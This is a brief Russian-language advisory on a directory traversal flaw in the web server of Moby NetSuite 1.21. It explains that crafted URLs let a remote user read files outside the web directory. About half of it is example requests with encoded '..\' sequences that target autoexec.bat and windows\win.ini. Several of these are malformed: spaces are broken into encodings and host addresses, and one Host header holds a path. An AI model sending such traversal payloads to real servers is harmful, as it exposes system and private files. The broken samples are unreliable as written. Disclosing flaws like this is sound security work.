Уязвимость обнаружена в Moby NetSuite в компоненте Web сервера.
Удаленный пользователь может просматривать файлы на системе, которые
расположены вне Web директории. Удаленный пользователь может представить специально обработанный URL,
содержащий символы обхода каталога, чтобы просматривать произвольные файлы
на системе. Пример:
GET / HTTP/1.1
Host: /error/%5c%2e%2e%5c%2e%2e %5c%2e%2e%5c%2e%2e%5cautoexec.bat
http://127.0.0.1/%5c..%5c..%5c..%5 cwindows%5cwin.ini
http://127.0.0.1/%5c..%5c..%5c..%5 cwindows%5cwin%2eini
http://1 27.0.0.1/\..\..\..\windows\win.ini
Уязвимость обнаружена в Moby NetSuite 1.21.
